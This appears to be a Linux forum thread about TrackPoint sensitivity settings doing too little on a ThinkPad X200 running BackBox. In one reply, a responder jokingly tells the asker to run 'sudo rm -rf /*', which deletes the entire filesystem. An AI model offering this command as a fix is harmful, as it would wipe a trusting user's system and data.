On a Lenovo Thinkpad X200 with Backbox 4.1, I use the red dot in the keyboard, but it is moving too slow on screen, I increased sensitivity in mouse settings but it doesn't change anything.
Other mouse settings work ok on same page, for example reversing left/right click; but not the sensitivity.

What can I try ?

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

I tried now. Mouse worked instantly when plugged, but changing sensitivity doesn't do anything.
Ca this be a permission issue? Can only root change some settings ?

Looks like the settings DO work, but the difference is very small for Lenovo trackpoint.
Is there a file I can edit where sensitivity is stored ?
Thanks.

Looks like Linux is not in best working point about this, sorry. I don't know if we can edit some files to make more changes. That is more question for Ubuntu developers then us.
